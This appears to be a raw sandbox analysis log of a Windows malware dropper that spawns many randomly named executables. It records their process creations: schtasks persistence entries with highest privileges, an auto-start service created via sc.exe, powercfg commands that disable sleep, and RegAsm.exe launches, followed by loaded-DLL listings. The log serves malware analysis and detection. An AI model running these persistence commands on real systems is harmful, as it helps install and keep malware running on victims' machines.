Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Process created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp "C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp" /SL5="$402F6,4891798,54272,C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe"
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe .\Install.exe /vHllWdidbTpr "525403" /S
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -i
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -s
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Process created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp "C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp" /SL5="$402F6,4891798,54272,C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe"
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -s
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe .\Install.exe /vHllWdidbTpr "525403" /S
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: gpedit.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dssec.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dsuiext.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msidle.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncasvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: httpprxp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wpdbusenum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceconnectapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Section loaded: devobj.dll	Jump to behavior
